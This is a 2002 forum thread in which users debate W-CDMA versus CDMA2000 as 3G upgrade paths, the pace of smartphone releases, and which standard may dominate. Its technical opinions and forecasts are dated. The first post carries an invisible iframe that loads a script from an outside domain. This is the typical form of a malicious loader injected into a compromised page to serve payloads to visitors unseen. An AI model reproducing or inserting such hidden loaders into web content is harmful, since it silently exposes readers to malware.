+ Reply to Thread

wideband - CDMA??

hmmmmmmmm.............. could this be the reason for the slow release of new smartphones??? Anyone know anything about 'W-CDMA"?? ... at first I thought it was another term for 3G but it isn't, it's something new.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    .....beam me up Scotty...

I don't think so. WCDMA is basically the upgrade path for GSM systems after GPRS while CDMA 2000 is for CDMA carriers with 1x EV-DO the next step after 1xRTT. No US carrier will have one of these WCDMA systems up for quite some time although I wouldn't be surprised if a couple have done or are currently doing some testing with WCDMA. With GPRS networks not anywhere near completion in the US, I wouldn't expect WCDMA systems in the US for at least a few years and I know phone manufacturers aren't going to wait on these WCDMA systems to release their latest and greatest.

BTW, WCDMA is a 3G technology. Current GSM systems are 2G, GPRS is 2.5G, and WCDMA is 3G.

Also, don't think smartphones are being released at a slow pace. It takes a lot of time, research, and developenent to create a smartphone that is well integrated, which will inevitably sow down the process compared to a regular mobile phone. However, there are a lot of smartphones set to be released within the next year (I330, I500, I600, I700, 7135, Compaq 5000 series, S-E P800, etc). Smartphones are a relatively new market and its going to take it some time to get it up to pace with the regualr mobile phone market. But as you can see, the smartphone market is slowly coming up to speed.

Last edited by Marty; 09-26-2002 at 10:39 AM.

WCDMA is basically the upgrade path for GSM systems
    thx for the clarification Marty
    .....beam me up Scotty...

I bet you $100 bucks that over the next couple of years, CDMA20001x and is EV-DO plus EV-DV variants will take over the 3G world. WCDMA has no bright future. The GSM carriers know it, they are just not admitting it. Besides, it costs MUCH less to implement and maintain a CDMA platform than the GSM route. Cost, efficiency plus network stability, not to mention digital clarity plus its contents, will be of key factor in determining who is successful and who is not.

This CDMA2000 and W-CDMA thing really is a mess. It started out as FPLMTS which has become IMT-2000 (year 2000 is long gone) which resulted in CDMA2000 for North America, and W-CDMA for Europe and Japan. Korea, which is where CDMA was first deployed, has both CDMA2000 (launched) and W-CDMA (planned). With anti-US minded Europeans behind W-CDMA and anti-Europe minded Americans behind CDMA2000, I think the divide is going to be there, for a decade more. Untill 4G or 5G, I think both will prosper (or flounder) about same.

For W-CDMA to overtake CDMA2000, I think two things will have to happen. One, China will chose to go with W-CDMA. I think they are deploying both CDMA and GSM now, so we don't know if they will chose to choose on a single national standard. Two, the GSM/GPRS carriers in the US prevail over CDMA incumbant market leaders. If those two were to happen and GSM/GPRS become more popular, then CDMA2000 will be gone.

For CDMA2000 to become the worldwide standard, mostly GSM European carriers will have to be consolidated into a large mega-carrier which will be bought by US-based (and CDMA2000-based) owners.

I don't think either is likely, so we'll have both. What a pain, and no global roaming... ever...

Hey, maybe Iridium and satellite communications really is the answer? (I'm being sarcastic )
    Last edited by rave; 09-26-2002 at 02:50 PM.